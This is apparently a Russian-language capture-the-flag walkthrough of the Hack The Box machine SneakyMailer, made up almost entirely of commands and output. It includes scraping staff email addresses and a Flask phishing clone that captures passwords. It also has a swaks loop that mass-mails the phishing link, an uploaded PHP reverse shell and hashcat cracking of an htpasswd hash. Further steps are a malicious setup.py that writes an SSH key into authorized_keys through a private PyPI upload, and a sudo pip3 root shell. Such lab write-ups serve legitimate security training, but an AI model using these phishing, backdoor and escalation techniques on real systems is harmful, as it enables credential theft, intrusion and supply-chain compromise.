Обзор сервисов
$ nmapAutomator.sh -H 10.10.10.197 -t Full
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: STARTTLS THREAD=ORDEREDSUBJECT ENABLE UTF8=ACCEPTA0001 ACL2=UNION ACL IMAP4rev1 THREAD=REFERENCES NAMESPACE QUOTA UIDPLUS IDLE CHILDREN SORT CAPABILITY OK completed
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:[email protected]
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: THREAD=ORDEREDSUBJECT ENABLE UTF8=ACCEPTA0001 AUTH=PLAIN ACL2=UNION ACL IMAP4rev1 THREAD=REFERENCES NAMESPACE QUOTA UIDPLUS IDLE CHILDREN SORT CAPABILITY OK completed
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:[email protected]
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
$ feroxbuster -u http://sneakycorp.htb/ -u /usr/share/dirb/wordlists/common.txt -x php,py,sh,txt,pdf
http://sneakycorp.htb/pypi/
$ feroxbuster -u http://sneakycorp.htb/pypi/ -u /usr/share/dirb/wordlists/common.txt -x php,py,sh,txt,pdf
200 81l 197w 0c http://sneakycorp.htb/pypi/register.php
Парсим электронную почту
Качаем все письма с помощью team.php:
curl http://sneakycorp.htb/team.php | grep '@' | awk '{gsub(/<[^>]*>/,"");print;}' | tr -d ' ' > emails.txt
Фишинг
Сохраняем HTML-страницу http://sneakycorp.htb/pypi/register.php:
mkdir templates
curl http://sneakycorp.htb/pypi/register.php -o templates/register.php
sed -i 's/\/vendor/http:\/\/sneakycorp.htb\/vendor/g' templates/register.php
sed -i 's/\/css\//http:\/\/sneakycorp.htb\/css\//g' templates/register.php
app.py:
from flask import *
import requests
app = Flask(__name__)
@app.route('/pypi/register.php',methods=['GET','POST'])
def register():
if request.method=="GET":
return render_template("register.php")
else:
print(request.args)
print(request.form)
requests.post('http://sneakycorp.htb/pypi/register.php',data=request.form)
return redirect('http://sneakycorp.htb',code=302)
app.run('0.0.0.0',80)
Запускаем app.py:
python3 app.py
mailer.sh:
while read email; do
echo "[+] Sending email from $email"
swaks --from [email protected] --to $email --header 'Subject: Register in the portal' --body 'http://10.10.14.6/pypi/register.php' --server sneakycorp.htb >/dev/null
done < emails.txt
Запускаем mailer.sh:
chmod +x mailer.sh
./mailer.sh
Ждем:
ImmutableMultiDict([('firstName', 'Paul'), ('lastName', 'Byrd'), ('email', '[email protected]'), ('password', '^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht'), ('rpassword', '^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht')])
Почтовый ящик
Логинимся с помощью Evolution. Переходим в отправленные:
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
FTP
С помощью найденных кредов логинимся на FTP и загружаем shell.php.
Перебирваем домены с помощью ffuf:
bruteforce domains using ffuf
$ ffuf -u http://sneakycorp.htb -H 'Host: FUZZ.sneakycorp.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 6
=> dev.sneakycorp.htb
Reverse Shell
nc -lnvp 1234
curl http://dev.sneakycorp.htb/shell.php
Linenum
=> .htpasswd =>pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Брутфорс
$ hashid
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
MD5 / APACHE md5
$ echo pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/ > htpasswd
$ hashcat -m 1600 htpasswd /usr/share/wordlists/rockyou.txt --username
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui
Веб
$ ls /var/www/
dev.sneakycorp.htb html pypi.sneakycorp.htb sneakycorp.htb
=> http://pypi.sneakycorp.htb:8080/
Логинимся на PyPI сервер http://pypi.sneakycorp.htb:8080/simple/pypi:soufianeelhaoui
Локальный пакет для PIP
$ wget https://files.pythonhosted.org/packages/85/73/daa5c91ce58cd5db7aebaca05fe8f7ca4223bfd32525dbec93662fb449b3/python-package-example-0.1.tar.gz
$ tar xvf python-package-example-0.1.tar.gz
$ nano setup.py
from setuptools import setup, find_packages
try:
with open("/home/low/.ssh/authorized_keys", "w") as f:
f.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCtRShyvgwXRSQCdJxVHSOmsvH1gbQMXAuUYSs0abix0cynMoPGfWCO9GE9nF6gSvcrvc>
except:
setup(
name='python-package-example',
version='0.1',
packages=find_packages(exclude=['tests*']),
license='MIT',
description='An example python package',
long_description=open('README.txt').read(),
install_requires=['numpy'],
url='https://github.com/BillMills/python-package-example',
author='Bill Mills',
author_email='[email protected]'
)
$ nano ~/.pypirc
[distutils]
index-servers =
remote
[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui
$ python3 setup.py sdist upload -r remote
Флаг пользователя
$ ssh [email protected]
low@sneakymailer:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:6f:34 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.197/24 brd 10.10.10.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:6f34/64 scope global dynamic mngtmpaddr
valid_lft 86240sec preferred_lft 14240sec
inet6 fe80::250:56ff:feb9:6f34/64 scope link
valid_lft forever preferred_lft forever
low@sneakymailer:~$ cat user.txt
cade53a4eec1995f11377ce494320f36
Повышение привилегий
Мы можем выполнять /usr/bin/pip3 с помощью sudo без пароля:
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
Флаг суперпользователя
$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:6f:34 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.197/24 brd 10.10.10.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:6f34/64 scope global dynamic mngtmpaddr
valid_lft 86029sec preferred_lft 14029sec
inet6 fe80::250:56ff:feb9:6f34/64 scope link
valid_lft forever preferred_lft forever
$ cat root.txt
4edf8e29eb56fb88b122e058ebc2f02d